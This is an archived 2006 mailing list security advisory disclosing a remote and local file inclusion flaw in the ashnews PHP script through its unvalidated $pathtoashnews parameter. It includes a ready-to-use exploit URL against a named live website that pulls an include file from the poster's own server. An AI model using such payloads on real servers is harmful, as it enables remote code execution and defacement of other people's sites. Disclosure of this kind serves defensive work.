[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <43DF3F47.8010700@f-box.org>
Date: Tue, 31 Jan 2006 10:43:19 +0000
From: DanB-FD <dan-fd@...ox.org>
To: Dan B UK <dan-fd@...ox.org>
Cc: zeus olimpusklan <zeus.olimpusklan@...il.com>,
full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
admin@...e-h.org, org@...urity.nnov.ru
Subject: Re: ashnews Cross-Site Scripting Vulnerability
Hi,
Dan B UK wrote:
> Due to the nature of the issue I am not disclosing the detail of it
> until the writer of the software has updated it; maybe you could have
> waited??
>
> A vulnerability that allows privileges of the apache user within the
> limitations of how much PHP has been locked down.
Since the author of the product has got back to me with the following I
think it is ok to disclose the issue now.
"That is a known error. Unfortunately I have completely abondoned
ashnews. In fact, I have been neglecting taking it down completely which
I am going to do right now. - Derek"
The issue is in the handling of the $pathtoashnews, it is not validated
before being used by the script. Allowing remote or local file inclusion.
eg:
http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc?
( The ? is required to make the remote server (f-box.org) ignore the
string that is appended to the variable $pathtoashnews )
( The website that is in the example above has already been defaced! )
Cheers,
DanB UK.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists